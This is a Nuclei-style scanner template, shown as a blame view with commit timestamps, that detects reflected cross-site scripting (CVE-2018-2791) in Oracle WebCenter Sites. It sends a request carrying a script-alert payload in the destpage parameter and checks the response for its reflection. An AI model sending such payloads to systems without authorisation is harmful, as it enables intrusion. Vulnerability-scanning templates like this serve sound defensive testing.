2021-01-02 05:00:39 +00:00
|
|
|
id: CVE-2018-2791
|
2020-04-08 11:37:09 +00:00
|
|
|
|
|
|
|
info:
|
|
|
|
name: Oracle WebCenter Sites XSS
|
2020-04-08 11:43:51 +00:00
|
|
|
author: madrobot
|
2021-09-10 11:26:40 +00:00
|
|
|
severity: high
|
2020-08-25 22:22:08 +00:00
|
|
|
description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware
|
2021-02-05 19:44:41 +00:00
|
|
|
tags: cve,cve2018,oracle,xss
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
|
|
|
|
cvss-score: 8.20
|
|
|
|
cve-id: CVE-2018-2791
|
|
|
|
reference:
|
|
|
|
- http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html
|
|
|
|
- http://www.securitytracker.com/id/1040695
|
|
|
|
- http://www.securityfocus.com/bid/103800
|
|
|
|
- https://www.exploit-db.com/exploits/44752/
|
2021-02-05 19:44:41 +00:00
|
|
|
|
2020-04-08 11:37:09 +00:00
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
2020-08-26 07:34:18 +00:00
|
|
|
- "{{BaseURL}}/servlet/Satellite?destpage=%22%3Ch1xxx%3Cscriptalert(1)%3C%2Fscript&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError"
|
2020-12-13 19:24:23 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
2020-04-08 11:37:09 +00:00
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
2020-08-26 07:31:07 +00:00
|
|
|
- "<h1xxx<scriptalert(1)</script"
|
2020-04-08 11:37:09 +00:00
|
|
|
part: body
|
2020-12-13 19:24:23 +00:00
|
|
|
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "text/html"
|
|
|
|
part: header
|